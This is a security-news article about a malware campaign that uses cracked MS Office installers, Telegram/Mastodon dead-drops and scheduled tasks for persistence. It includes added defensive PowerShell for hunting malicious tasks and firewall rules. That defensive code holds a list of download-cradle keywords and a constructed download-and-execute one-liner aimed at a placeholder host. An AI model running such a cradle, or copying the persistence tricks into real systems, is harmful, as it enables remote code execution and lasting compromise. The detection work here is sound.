CyberSecurity SEE

Hackers are using cracked versions of MS Office to distribute malware

Attackers targeting users in South Korea have been distributing malware, including Remote Access Trojans (RATs) and cryptocurrency miners, disguised as cracked software. They combine several persistence techniques so that the malware comes back even after the initially installed components are found and removed.

One persistence method is to register a scheduled task with the Windows Task Scheduler, the built-in utility for automating jobs. The task runs PowerShell commands that download and install new variants of the original malware. Because those commands and payloads change frequently, signature-based defenses struggle to keep up, and the result is ongoing information theft, proxy abuse, and cryptocurrency mining on the affected machines.

The initial lure is delivered through file-sharing platforms, where the malware is posted as a cracked version of popular software such as Microsoft Office. During the infection process the malware retrieves a download URL and a target-platform value from the attackers' infrastructure, which lets them swap payloads and hosting at will and makes the campaign harder to detect.

The malware is written in .NET and obfuscated to hide its malicious code. Early versions contacted the messaging platform Telegram to retrieve a download URL. Newer versions carry multiple Telegram URLs and a Mastodon URL; each page hosts a unique string that resolves to a file on cloud storage, either Google Drive or GitHub.

The files hosted in those cloud storage locations contain PowerShell commands that are Base64-encoded as a further layer of obfuscation. Once decoded and executed, these commands install additional malware strains on the compromised system.

One component runs under the file name “software_reporter_tool.exe” (a name that mimics a legitimate Chrome component) and uses a PowerShell script to fetch its payload and maintain persistence. It writes a malicious executable to a fixed location and uses 7-Zip to extract a password-protected archive downloaded from GitHub or Google Drive. These tactics mirror earlier campaigns and are designed to keep the malware running and unnoticed.

The updater is also registered with the Task Scheduler so that it keeps running after a reboot. The scheduled task launches a PowerShell script that checks for updates and installs further malware, which is how the attackers retain control of the compromised system.
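The scheduled-task persistence described above is something a responder can hunt for directly. The following PowerShell is an added example written for this page, not code from the page or from ASEC; the indicator keyword list, the set of script hosts it looks for, and the constructed sample payload at the end are assumptions. It enumerates every scheduled task whose action launches PowerShell or another script host, decodes any -EncodedCommand argument (Base64 of UTF-16LE text), and flags download-cradle keywords so the updater's fetch logic can be read in clear text.

```powershell
# Added example, not from the original page or the ASEC report.
# Hunt for scheduled tasks that launch PowerShell (or another script host) and
# decode -EncodedCommand payloads so a downloader cradle can be read in clear text.
# Run from an elevated prompt so tasks registered by other accounts are visible.

# Keywords that commonly appear in download-and-execute cradles (assumed list; extend as needed).
$indicators = @(
    'DownloadString', 'DownloadFile', 'Invoke-WebRequest', 'iwr', 'curl',
    'Invoke-Expression', 'iex', 'FromBase64String', 'Start-BitsTransfer',
    't.me', 'telegram', 'mastodon', 'drive.google.com', 'github.com', 'raw.githubusercontent.com'
)

function Get-DecodedEncodedCommand {
    # powershell.exe accepts -EncodedCommand, -ec and -e; the value is Base64 of UTF-16LE text.
    param([string]$ArgumentString)
    if ($ArgumentString -match '(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})') {
        try {
            return [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[1]))
        } catch {
            return $null   # not valid Base64; caller falls back to the raw argument string
        }
    }
    return $null
}

function Find-SuspiciousScheduledTask {
    foreach ($task in Get-ScheduledTask) {
        foreach ($action in $task.Actions) {
            # Only "Exec" actions carry a program path; ComHandler and e-mail actions are skipped.
            if ($action.CimClass.CimClassName -ne 'MSFT_TaskExecAction') { continue }

            $exe     = [string]$action.Execute
            $argText = [string]$action.Arguments
            if ($exe -notmatch 'powershell|pwsh|cmd\.exe|wscript|cscript|mshta|rundll32') { continue }

            $decoded = Get-DecodedEncodedCommand -ArgumentString $argText
            $body    = if ($decoded) { $decoded } else { $argText }
            $hits    = @($indicators | Where-Object { $body -match [regex]::Escape($_) })

            [pscustomobject]@{
                TaskPath   = $task.TaskPath
                TaskName   = $task.TaskName
                Author     = $task.Author
                Execute    = $exe
                Arguments  = $argText
                Decoded    = $decoded
                Indicators = ($hits -join ', ')
                HitCount   = $hits.Count
            }
        }
    }
}

# Tasks with the most indicators first; tasks with none are still listed for manual review.
Find-SuspiciousScheduledTask | Sort-Object HitCount -Descending | Format-List

# Self-check with a constructed payload (not a sample from the campaign):
$cradle  = 'iex (iwr https://example.invalid/update.ps1 -UseBasicParsing).Content'
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($cradle))
Get-DecodedEncodedCommand -ArgumentString "-NoP -W Hidden -enc $encoded"
```

A genuine hit is a task whose decoded or raw arguments pull a script from a social, paste or cloud host and feed it to Invoke-Expression. When cleaning up, remove the task first (Unregister-ScheduledTask -TaskName ... -TaskPath ...) and only then delete the dropped binaries; in the reverse order the next trigger simply reinstalls them, which is the repeat-infection behaviour the campaign relies on.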

On the compromised systems, the attackers deploy Orcus RAT and XMRig. Orcus RAT is capable of stealing information through keylogging, webcam access, and screenshot capture, while XMRig is used for cryptocurrency mining.

XMRig is configured to pause mining when resource-intensive programs are running, and it can terminate processes that compete for resources, including security software installers. The attackers also use 3Proxy to turn the infected machine into a proxy server, adding a firewall rule so the proxy can accept connections and injecting it into a legitimate process to blend in.
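The firewall rule the proxy needs is itself a useful artifact. The PowerShell below is an added example for this page, not code from the page or from ASEC; the list of trusted directory roots is an assumption to adjust per build. It lists enabled inbound Allow rules whose program path lies outside the normal install directories, and then cross-checks which processes are actually listening, because a proxy injected into a legitimate process would pass a path-based filter.

```powershell
# Added example, not from the original page or the ASEC report.
# Part 1: enabled inbound Allow rules whose program sits outside the usual install roots,
# the kind of rule a dropped proxy binary needs in order to accept connections.
# Directory roots treated as trusted (assumed list; adjust to your build).
$trustedRoots = @($env:windir, $env:ProgramFiles, ${env:ProgramFiles(x86)}) | Where-Object { $_ }

function Find-UntrustedInboundAllowRule {
    foreach ($rule in Get-NetFirewallRule -Direction Inbound -Action Allow -Enabled True) {
        $appFilter  = $rule | Get-NetFirewallApplicationFilter
        $portFilter = $rule | Get-NetFirewallPortFilter

        # Rules without a concrete program path ('Any', 'System') are a separate review; skip them here.
        if (-not $appFilter.Program -or $appFilter.Program -in @('Any', 'System')) { continue }

        $program = [Environment]::ExpandEnvironmentVariables($appFilter.Program)
        $inTrustedRoot = $trustedRoots | Where-Object { $program.StartsWith($_, [StringComparison]::OrdinalIgnoreCase) }
        if ($inTrustedRoot) { continue }

        [pscustomobject]@{
            DisplayName = $rule.DisplayName
            Program     = $program
            Exists      = Test-Path -LiteralPath $program
            Protocol    = $portFilter.Protocol
            LocalPort   = ($portFilter.LocalPort -join ',')
            Profile     = $rule.Profile
            Group       = $rule.DisplayGroup
        }
    }
}

Find-UntrustedInboundAllowRule | Format-Table -AutoSize

# Part 2: what is really listening, with the owning process image path.
# An injected proxy runs inside a legitimate host process, so compare this list against
# the rules above and against what that host is expected to do.
Get-NetTCPConnection -State Listen |
    Select-Object LocalAddress, LocalPort, OwningProcess,
        @{ n = 'Process'; e = { (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).Path } } |
    Sort-Object LocalPort | Format-Table -AutoSize
```

A rule pointing at a binary under a user profile or temp directory, or at a path that no longer exists, is worth pulling the rule's creation context for; a listener inside a process such as a browser or system utility that has no reason to accept inbound connections is the injected-proxy case the path filter alone would miss.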

According to security researchers at ASEC, PureCrypter downloads and executes further payloads, while the AntiAV malware disrupts security products by modifying their configuration files.

In summary, the attackers behind this campaign distribute malware disguised as popular software through file-sharing sites, evade detection by updating their payloads frequently, and use the Task Scheduler for persistence. That persistence is why systems become reinfected even after the initial malware is removed: unless the scheduled task and its updater are removed too, the next trigger reinstalls everything. Users should avoid software from untrusted sources, especially cracked installers, and keep their systems patched and protected.
